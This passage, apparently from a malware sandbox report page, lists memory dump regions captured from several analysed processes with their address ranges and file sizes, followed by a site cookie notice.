              • memory/1396-128-0x000002E6D0CC0000-0x000002E6D0CE0000-memory.dmp

                Filesize

                128KB

              • memory/1396-131-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-132-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-134-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-140-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1396-135-0x000002E6D0CC0000-0x000002E6D0CE0000-memory.dmp

                Filesize

                128KB

              • memory/1396-137-0x000002E6D0CE0000-0x000002E6D0D00000-memory.dmp

                Filesize

                128KB

              • memory/1396-138-0x00007FF7E6F90000-0x00007FF7E7784000-memory.dmp

                Filesize

                8.0MB

              • memory/1940-52-0x00007FFFE7DC0000-0x00007FFFE8881000-memory.dmp

                Filesize

                10.8MB

              • memory/1940-46-0x00007FFFE7DC0000-0x00007FFFE8881000-memory.dmp

                Filesize

                10.8MB

              • memory/1940-48-0x0000022185A50000-0x0000022185A60000-memory.dmp

                Filesize

                64KB

              • memory/1940-49-0x0000022185A50000-0x0000022185A60000-memory.dmp

                Filesize

                64KB

              • memory/2764-0-0x00007FF7CA0A0000-0x00007FF7CA2B1000-memory.dmp

                Filesize

                2.1MB

              • memory/2764-36-0x00007FF7CA0A0000-0x00007FF7CA2B1000-memory.dmp

                Filesize

                2.1MB

              • memory/3948-53-0x00007FF7E19C0000-0x00007FF7E1BD1000-memory.dmp

                Filesize

                2.1MB

              • memory/3948-121-0x00007FF7E19C0000-0x00007FF7E1BD1000-memory.dmp

                Filesize

                2.1MB

              • memory/4568-100-0x00007FFFE7DC0000-0x00007FFFE8881000-memory.dmp

                Filesize

                10.8MB

              • memory/4568-115-0x00007FFFE7DC0000-0x00007FFFE8881000-memory.dmp

                Filesize

                10.8MB

              • memory/4568-112-0x000001805EA00000-0x000001805EA10000-memory.dmp

                Filesize

                64KB

              • memory/4568-113-0x000001805EA00000-0x000001805EA10000-memory.dmp

                Filesize

                64KB

              • memory/4568-101-0x000001805EA00000-0x000001805EA10000-memory.dmp

                Filesize

                64KB

              • memory/4568-102-0x000001805EA00000-0x000001805EA10000-memory.dmp

                Filesize

                64KB

              • memory/4640-1-0x00000213DC480000-0x00000213DC4A2000-memory.dmp

                Filesize

                136KB

              • memory/4640-16-0x00007FFFE7DC0000-0x00007FFFE8881000-memory.dmp

                Filesize

                10.8MB

              • memory/4640-13-0x00000213DC4C0000-0x00000213DC4D0000-memory.dmp

                Filesize

                64KB

              • memory/4640-12-0x00000213DC4C0000-0x00000213DC4D0000-memory.dmp

                Filesize

                64KB

              • memory/4640-11-0x00007FFFE7DC0000-0x00007FFFE8881000-memory.dmp

                Filesize

                10.8MB

              • memory/5080-28-0x00007FFFE7DC0000-0x00007FFFE8881000-memory.dmp

                Filesize

                10.8MB

              • memory/5080-30-0x0000016F75E70000-0x0000016F75E80000-memory.dmp

                Filesize

                64KB

              • memory/5080-31-0x0000016F75E70000-0x0000016F75E80000-memory.dmp

                Filesize

                64KB

              • memory/5080-32-0x0000016F75E70000-0x0000016F75E80000-memory.dmp

                Filesize

                64KB

              • memory/5080-34-0x00007FFFE7DC0000-0x00007FFFE8881000-memory.dmp

                Filesize

                10.8MB

              • memory/5080-29-0x0000016F75E70000-0x0000016F75E80000-memory.dmp

                Filesize

                64KB

              We care about your privacy.

              This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.